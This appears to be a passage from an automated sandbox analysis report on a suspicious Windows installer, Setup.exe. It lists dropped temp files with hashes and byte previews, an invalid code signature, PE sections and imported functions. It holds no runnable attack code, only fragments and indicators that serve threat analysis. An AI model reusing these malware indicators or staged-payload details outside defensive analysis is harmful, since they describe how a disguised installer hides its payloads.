                                                                Preview:a.r.i.a.b.l.e.s. .a.l.l.o.w.e.d. .i.n. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...v.".l.o.n.g._.p.t.r.".,. .".i.n.t._.p.t.r.". .a.n.d. .".s.h.o.r.t._.p.t.r.". .D.l.l.C.a.l.l.(.). .t.y.p.e.s. .h.a.v.e. .b.e.e.n. .d.e.p.r.e.c.a.t.e.d... . .U.s.e. .".l.o.n.g.*.".,. .".i.n.t.*.". .a.n.d. .".s.h.o.r.t.*.". .i.n.s.t.e.a.d...-.O.b.j.e.c.t. .r.e.f.e.r.e.n.c.e.d. .o.u.t.s.i.d.e. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...).N.e.s.t.e.d. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.

                                                                C:\Users\user\AppData\Local\Temp\Newbie

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):55296
                                                                Entropy (8bit):6.548215294045205
                                                                Encrypted:false
                                                                SSDEEP:768:JQ18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSB:m1/AD1EsdzVXnP94SGGLpRB6M20
                                                                MD5:EF4E81CB8052EE9B5A6FC6DCD7567548
                                                                SHA1:B919759461FD777C96B4F322F408812009B40C00
                                                                SHA-256:B02877F89D3F3E8327DB1964DAE27C0E7C5087527BA650066C1BD6C6E4A4F715
                                                                SHA-512:067B2BB15104B685E243EE08177C94625F55713FAD6D2264088650B889B0208448DC428ACC5EED0056D959686D338396AAF18D23EFD2C7C07203FDBBA1EDCBBC
                                                                Malicious:false
                                                                Preview:...............................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...............

                                                                C:\Users\user\AppData\Local\Temp\Sail

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset -9444732965739290427392.000000, slope 2734396502252404170448376371133546496.000000
                                                                Category:dropped
                                                                Size (bytes):60416
                                                                Entropy (8bit):6.067319379992331
                                                                Encrypted:false
                                                                SSDEEP:768:50vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwun:50vtmgMbFuz08QuklMBNIimuzaAwusq
                                                                MD5:7E9F33DC7CC9891C8CA419EBC7B31AAA
                                                                SHA1:DA6037F59597399A96A8E756D819CD0E2E104A4A
                                                                SHA-256:5C5491AC3971BFA44F13F9719F011A7B1B353BC4127ECF7195A74513345EB7BB
                                                                SHA-512:8BAD109A56DC7C0B03B0848C962FE60DD878EE9209D2FDE90E1429EF77D3B58E0A03CA795805EBE08CED195AE45AB895BB68AD952BF1ED9595C33AEC0C71E8E5
                                                                Malicious:false
                                                                Preview:u.z.-.e.c.....q.u.z.-.p.e.....r.o.-.r.o...r.u.-.r.u...s.a.-.i.n...s.e.-.f.i...s.e.-.n.o...s.e.-.s.e...s.k.-.s.k...s.l.-.s.i...s.m.a.-.n.o.....s.m.a.-.s.e.....s.m.j.-.n.o.....s.m.j.-.s.e.....s.m.n.-.f.i.....s.m.s.-.f.i.....s.q.-.a.l...s.r.-.b.a.-.c.y.r.l.....s.r.-.b.a.-.l.a.t.n.....s.r.-.s.p.-.c.y.r.l.....s.r.-.s.p.-.l.a.t.n.....s.v.-.f.i...s.v.-.s.e...s.w.-.k.e...s.y.r.-.s.y.....t.a.-.i.n...t.e.-.i.n...t.h.-.t.h...t.n.-.z.a...t.r.-.t.r...t.t.-.r.u...u.k.-.u.a...u.r.-.p.k...u.z.-.u.z.-.c.y.r.l.....u.z.-.u.z.-.l.a.t.n.....v.i.-.v.n...x.h.-.z.a...z.h.-.c.h.s.....z.h.-.c.h.t.....z.h.-.c.n...z.h.-.h.k...z.h.-.m.o...z.h.-.s.g...z.h.-.t.w...z.u.-.z.a...0...1#INF...1#QNAN..1#SNAN..1#IND..............?.......?.......?.....D.?.......?.......?....@..?....@W.?.......?.......?.......?.....w.?.....A.?.......?....@..?.......?.....q.?.....?.?.......?....@..?.......?.....}.?.....N.?....@ .?.......?.......?.......?.....m.?.....A.?.......?.......?.......?.......?.....q.?.....H.?.....!.?.......?.......?..

                                                                C:\Users\user\AppData\Local\Temp\Served

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):777
                                                                Entropy (8bit):3.9586418744428995
                                                                Encrypted:false
                                                                SSDEEP:12:pyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:pyGS9PvCA433C+sCNC1
                                                                MD5:906017194573324C7F663EC0C29DD8E6
                                                                SHA1:05F6873387E6DAA4ED362B5C1AE4778C0DDFAC11
                                                                SHA-256:A53D274AB9542F5FFC54F3C3F556A24F6908AA19012B28537BD3FBB2687BE9A5
                                                                SHA-512:9FDFAC75BE2374037D7E6548EB48700583153C6A8E8B194D82C5FEF71769073B30B955BA142B21C272A9B00456FBD88D4BC455C2890B56AF8A07EC6740387D29
                                                                Malicious:false
                                                                Preview:Travels........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................

                                                                C:\Users\user\AppData\Local\Temp\Shaved

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):87040
                                                                Entropy (8bit):6.574129972694159
                                                                Encrypted:false
                                                                SSDEEP:1536:Dn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5G:D+AqVnBypIbv18mLthfhnueoMmOqDoiu
                                                                MD5:CCDB4B10228BD73A42BD9BDCACD6C3FA
                                                                SHA1:F3A53ECDAAB5FC3A748030C6F3228522B425F8C7
                                                                SHA-256:AC2797C2FE10F695311429692DC965D78E2DD1832871705B30F113F52ED717C0
                                                                SHA-512:CD90A39214166E12B6D7C3616353BB3D796DD15F612E986BF9DBD5B635B4F6D62957F11119FD1945E0A4C73E07C0045D64371BBD8C3949D6659C135E34A8E2ED
                                                                Malicious:false
                                                                Preview:.]...U.....e..SV.u.W.........j...j.S.D....E.....x..v..@....9m.....E.P.E.P.E.P.......tN.E.3..e..Fj..E.E.VPS.u..........M...+...E..e..V.E.E.VPS.u..........M...*...8...H..|9...D9.t..@83.C.X..|9...D9.t..@8...@....*...&..^._^3.[....U..E...8.@.SVW.p.....~..u..E.P..^.....E.....3.]....0.....N..E......A....E.A..E..A..M.U.E...3.]..A..q..E..A..U.u.E....}..t..M..$....}..t..M........tM.E..P.......u>.u.....*..3..B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.X.....+.E..M.Q.@.......P.....u......)..3.>B.V..M....._^..[....U......,SV.u.3.W..\$..~..v..F..H..Dk...D$..N..1.~..t.PSS..........6.t$............]...j....B7.......K...j....07..3..j.Z..|$........Q..C....3..D$.Y..........j.Pj.j.V..^...............N..t$.j..t$....D$0.A..D$4.A..D$8.A.j.j.V...D$H.^............D$$.D$.P.D$.P.D$.P.D$.P.D$0P.D$<P......tm.|$......t......|$..t......|$..t.....f.D$ .L$(f.G..D$$f.G..'....D$....@.D$.;D$...)....|$..t$.WS....S..B..Y.9S..B...u.Y....'...&..L$(.F.............u.....'...F......._^3.[..]...U..SV.u

                                                                C:\Users\user\AppData\Local\Temp\Statement

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):81920
                                                                Entropy (8bit):7.998049076509527
                                                                Encrypted:true
                                                                SSDEEP:1536:yBfTExvxpZXh9ubx46Aluo2N2J8hcTqQieQoVSPUFowd9XPy0QZuX/OBpNL:yBfgBxJ9M1AAo2Nk+KieVFLcZ6mjNL
                                                                MD5:281F4DB819997789982068F550A35072
                                                                SHA1:FAF56A4CB2B14ADBA50CEFB49927B4E73F1FF5C2
                                                                SHA-256:5B195BE894B7155D3147588D728098068D36CDBB9DF72FABD577057E699E2025
                                                                SHA-512:8A5956B6E2DA603A5A0E1CFDBBDCC6D4094C92DAF0E0465162B3630DA642F22A90B0972B6B6C83A969BE66A6FA0B0201F40AA24777F1C4A6B5DD2895D91109F0
                                                                Malicious:false
                                                                Preview:nj.*~m^$..~hF.8v..S.._..(%....=....I......vS.x.G .........Xd....l...e.NJ4.81...{u.9.5..k......:.E2.bY.Y.&.yQB.E..|.[s>...(.e.`...q{I...3.J..R?.... ..0....0........'....t.(..7o...ye<At....-.<...n.......d..1FU.c...L..af..G..../.{."...H/:....h..'.|.#B....v....z......T.....o....E)...#Y`s..y..].].*..._.....e....ab0.+..;`c5).......rS...7U9.O.......l....O..UW.].)Rk ..2....Q..QD.3A.zx.I..y.....%......aM..M.cd.6$R.6......c..t2..(MDLT-i........nR.w...cI..c....'...=.o........".O.......C.h"..E.x.`...s4C.5)..s..M......%=iW...^.f.F..X>f.Z.U.8.yk.(bt.NW.....&...g..3..&>.LgL...M.Y5a....O.4.;.....+...I;6d..E.4.<....T...V.....r...9..&..................j..3tU..A..5.......l........i-M..:..W.u.MF.Kd.1a..../Z{+.....&.\.nj.{..6y..<.2....s/Y.Y.#.;...W...Ty.D%s:..x.>....u........G.x.^....1.H......Y..R..!}l..?c=J0,pD0.....=,..e+50.......G.....X..N.G!i.......526.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.

                                                                C:\Users\user\AppData\Local\Temp\Systems

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:OpenPGP Public Key
                                                                Category:dropped
                                                                Size (bytes):12492
                                                                Entropy (8bit):7.984190657327211
                                                                Encrypted:false
                                                                SSDEEP:384:c1Lx+zglTnjPebzZfwXumF9g76gzy2X44vYvu2:ExNebNfwek9g7dzO
                                                                MD5:14ABCC1FCB7EB77CB471AAA77133F0E8
                                                                SHA1:457C0EDD3339EEE816C6917B33C2B1F6B962BD21
                                                                SHA-256:CBB561B7501EDC6B3DBB134C951459887D7F1D02AE151FD2EEED6EF1DD0A26EA
                                                                SHA-512:71FB1BA3C8B5844A7FD98720E18803F0D416877FAFA2E5AE21012890E2322C588C2EF1B7535C89CA6C065B3D41DCA2215CC22D7D4E0EB1F215E0A10EBCEDF6D7
                                                                Malicious:false
                                                                Preview:......t...b..A.......@.a.<.wH<...Y9.<%.K...<.....h..e.]...`...u.."<,h..y7......P.yK..o....36#%..%gc*k.?.Q....Q.^.....p....iF....Gf.f0..?1.r\0?U..)~.(b.s....Z..K.4U...i.-.......FG.b.....CF.d.+...p..V.......c..'^$.,.......c...0...R.t.W_..../...z.&ng....8.". ....!. .*H.0.....K.....tTl.!._....u%...g.....O.M2....yX........yk....m...~m...W.U.. .......aX.6@...<.....J.&.b..e....c..P...|. -.#LN...3...)dR5......../r...?.O.C;F....R.#~.......h.M.2............Jv! .....f.P..Q..{Q.....)h.P.S....K.A.S...{.._.C...$.:._.m.4...=.}Vn..:.c*I.....ud|22.r.8...}......s.f..vx...,...{M.N.mJUj.g.SH.......K--........tX.;....{......./.c..s?.$.6+..b."..K..T+...n..,.8:`....,.....".96..0..p<Z5....D.Vd..*.x$....s..T..Ro...q.W.+..Di....&.^.5...f...X..x..d.....h.Y.M..L6$..p.gk..i.......~=.:.../L..]`.P_..K.@+q.u..B.".9A...#.g9..O2..0.(y+..D&`+L.]....!.......0Ab...T3..B&E..}..qE....~..SQ...F;H.._c..-.H......$i.....)..6......O.="....c...U.X..<.7G..%..]d....U..@...;..b...d

                                                                C:\Users\user\AppData\Local\Temp\Toys

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):130048
                                                                Entropy (8bit):6.681687090731543
                                                                Encrypted:false
                                                                SSDEEP:3072:FU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRV:FhClbfSCOMVIPPL/sZx
                                                                MD5:9A4BA095FCF59853D46AACC0ED9ACEDC
                                                                SHA1:2F8F477F9998C719AC860B8DF65CF64F2E1AF684
                                                                SHA-256:3ACADE67A3C43300472BADD003325ACD4D4CA5A32857312BBBFD21E5A16AED9A
                                                                SHA-512:475E483ED5E0720D30C68A2BD268299A0346ED0E660252C97982C6AB605B7C81BE83000EF9947F5F8ADBE92B0BE660013BA7FCEE5E843565BA82277706D7DC1E
                                                                Malicious:false
                                                                Preview:f...................%....=....uef..L$.f..T$......f.n.f.T..=J.f.s.4f...f...f...f.v.f...%....=....t#f..L$.f....%.......t...0>J....(>J..f..L$.f....%................f..L$.f....%..................X..........]...f..T$.f.~.f.s. f.~.....................f....>J.f...P>J...Y..........f..d$.f..T$.f.~....u f.s. f.~.....?...........u....f....=J.f.W.f.T.f.v.f...%....=....uUf....f..d$.%......................t.f....%....=.?..r....f....%....=.?..s...... >J....X..........Yf.~.f.s. f.~..........f....=J.........t0f.~.....%....=....w.r....w....f..D$..D$..........f..D$..T$......T$.....T$......$.9...D$.......~(=......<...V.................W..?...&=..........V................W.......X.......X..=J.......f.Y...\..=J.f.Y...\.........f.(.@.J.f.(5.=J.f.Y.f.X.f.p....Y...X...X.f..%.>J.f.n................ ..f.W...?..f......YT$...Y.f.s.-f.p.Df.(=.=J...X.f.Y...X.f...f.Y...Y.f.Y.f.X.f.Y...Y.f.p....Y.f.p....Y...Y.f.n.f.s.-f.n.f.v.f.....X...X.f.T...X.f.W.f.v.f.....\.......X.f.T.f...._..\...X...X.

                                                                C:\Users\user\AppData\Local\Temp\Tragedy

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):84992
                                                                Entropy (8bit):6.0785099969245255
                                                                Encrypted:false
                                                                SSDEEP:1536:wLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8and:wLezW9FfTut/Dde6u640ewy4Za9coRCf
                                                                MD5:682B26D2846887714186B4B1D1CDC9E5
                                                                SHA1:83852C4B46E5227BF3E504332FCD2DA383522E28
                                                                SHA-256:59C4F79996F0F5D26FE7738394AB12FFEBA82518A05904AF12044F09DC6AF077
                                                                SHA-512:893C430C1C63D5A153832DB6098460F058236FFE33143F7F3BE15D1B8424138402D177A16494353E677ED051DF1FBF7ADF980FE080589E24876CCA73C4A25CE2
                                                                Malicious:false
                                                                Preview:$......@..hp.L..=..Y.L$$;.uZ..t/.T$ .p.L.+.T$...8.....|$.f;.|$.u&.T$.......u....u!SSh2....7..H.I.....f;T$......@....L..L$ .......t&.F..H......j.Ph,....7..H.I........K......L..L$ ......t.j.j..M...L..L$ .{.....t.j.j......P9L..L$ .`.....t$.F..H.....N...I........u...PSj..W...L..L$ .*.....t........?.... .L..L$ .......t3.F..H..8....N..D$..I..)....L$...u...PQS............P.L..L$ .......t4.F..H.........D$0P..D$..t$.......M..D$0P.\j.......@.L..L$ ......t<.F..p...x...}...v.......L$.PV.......u........F......>.f.`.L..L$ .3.....t..F..p....}...v........;.u....Z....L$.3.B...V....p..D..8\..t..@8.P..D..8\..t..@8.X..L$@. ....L$ ......L$0....._^3.[..]...U....SV.u...WV.]..~..b..................E.j.P..2.............s..].+]....F..H........s..}.+}....F..H.......V.j).J......t..u....f....V....E..J.j).}.....t..E....F....M.WSP......V.#4.....u....;....&..F....._^3.[....U..SV.u...V......u..u.........&..F......a.~..Wr5.F..H.......t&.......8.F..p.....{..W.v...........$.......8.F..

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):4.648387822130976
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:Setup.exe
                                                                File size:73'409'696 bytes
                                                                MD5:588eeb3d8f305fc008f034e10e0015c0
                                                                SHA1:7a77ed807fbea72e7c94295343cf795e864adfae
                                                                SHA256:d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
                                                                SHA512:695c39c2431ccb608cab670b50b74ede41284f0d1bb22330f1cd7ac72812e72be314a4ad1e75589391f813a3f5d40db4d49d3495f143c8f3ef4615f73412e760
                                                                SSDEEP:24576:VEqVaQlXM7Iqu1NA+quN4PtP644/97g/z6VvwyKcqxj8FbgtRWY/gEyhJlgi:Taec0qmiPJ644/97I6VvGj8Fbg63rhB
                                                                TLSH:E6F79B2E226CF7F91BBD846673933821E736AA802B10A34FF836D44D1CF68B75159B15
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                File Icon

                                                                Icon Hash:ccb2b1717133b2cc

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4038af
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                Subject Chain
                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                Version:3
                                                                Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                Serial:115BBE9E1C286827AF66E7A01390C206

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                xor ebp, ebp
                                                                pop esi
                                                                mov dword ptr [esp+18h], ebp
                                                                mov dword ptr [esp+10h], 0040A268h
                                                                mov dword ptr [esp+14h], ebp
                                                                call dword ptr [00409030h]
                                                                push 00008001h
                                                                call dword ptr [004090B4h]
                                                                push ebp
                                                                call dword ptr [004092C0h]
                                                                push 00000008h
                                                                mov dword ptr [0047EB98h], eax
                                                                call 00007FDD40C65AABh
                                                                push ebp
                                                                push 000002B4h
                                                                mov dword ptr [0047EAB0h], eax
                                                                lea eax, dword ptr [esp+38h]
                                                                push eax
                                                                push ebp
                                                                push 0040A264h
                                                                call dword ptr [00409184h]
                                                                push 0040A24Ch
                                                                push 00476AA0h
                                                                call 00007FDD40C6578Dh
                                                                call dword ptr [004090B0h]
                                                                push eax
                                                                mov edi, 004CF0A0h
                                                                push edi
                                                                call 00007FDD40C6577Bh
                                                                push ebp
                                                                call dword ptr [00409134h]
                                                                cmp word ptr [004CF0A0h], 0022h
                                                                mov dword ptr [0047EAB8h], eax
                                                                mov eax, edi
                                                                jne 00007FDD40C6307Ah
                                                                push 00000022h
                                                                pop esi
                                                                mov eax, 004CF0A2h
                                                                push esi
                                                                push eax
                                                                call 00007FDD40C65451h
                                                                push eax
                                                                call dword ptr [00409260h]
                                                                mov esi, eax
                                                                mov dword ptr [esp+1Ch], esi
                                                                jmp 00007FDD40C63103h
                                                                push 00000020h
                                                                pop ebx
                                                                cmp ax, bx
                                                                jne 00007FDD40C6307Ah
                                                                add esi, 02h
                                                                cmp word ptr [esi], bx

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ C ] VS2010 SP1 build 40219
                                                                • [RES] VS2010 SP1 build 40219
                                                                • [LNK] VS2010 SP1 build 40219

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x59efa.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x45fffd00x24d0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x1000000x59efa0x5a0000ccbca815b7df0bc03a078ee84f909aaFalse0.9669406467013889data7.86959447360422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x15a0000xfd60x1000b0d05814ea00da63327959615c44f046False0.568359375data5.309946074381747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x1002c80x4ce42PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9883726099077302
                                                                RT_ICON0x14d10c0x68d9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950076375693901
                                                                RT_ICON0x1539e80x209fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013172075200574
                                                                RT_ICON0x155a880x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5272579332790887
                                                                RT_ICON0x1580f00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6261384335154827
                                                                RT_ICON0x1592180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7978723404255319
                                                                RT_DIALOG0x1596800x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0x1597800x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0x15989c0x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0x1598fc0x5adataEnglishUnited States0.7888888888888889
                                                                RT_VERSION0x1599580x2ccdataEnglishUnited States0.4818435754189944
                                                                RT_MANIFEST0x159c240x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
